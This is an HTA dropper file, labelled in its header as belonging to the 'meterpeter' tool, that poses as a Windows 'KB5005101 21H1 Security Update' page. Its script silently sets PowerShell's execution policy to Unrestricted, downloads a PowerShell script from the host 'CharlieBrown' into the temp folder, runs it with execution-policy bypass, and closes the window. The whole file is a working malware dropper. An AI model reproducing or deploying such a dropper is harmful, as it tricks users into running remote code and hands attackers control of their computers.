<!--
   Hta_Version: 1.0.4
   Author: @r00t-3xp10it (ssa)
   Application: meterpeter v2.10.10 dropper
-->

<title>KB5005101 21H1 Security Update</title>
<script>
   path = document.URL
   document.write(
      '<HTA:APPLICATION ID="oHTA" APPLICATIONNAME="meterpeter" SHOWINTASKBAR="yes" ICON="https://github.com/favicon.ico">'
   );
   Loki=new ActiveXObject("WScript.Shell");
   Loki.run("cmd /R echo Y|Powershell Set-ExecutionPolicy UnRestricted -Scope CurrentUser", 0);
   Loki.run("powershell cd $Env:TMP;iwr -Uri 'http://CharlieBrown/Update-KB5005101.ps1' -OutFile 'Update-KB5005101.ps1';powershell -W 1 -exec bypass -File 'Update-KB5005101.ps1'", 0);
   window.close();
</script>
<body bgColor="Grey"><center><H2><b><i>KB5005101 21H1 - Security Update</i></b></H2></center></body>






























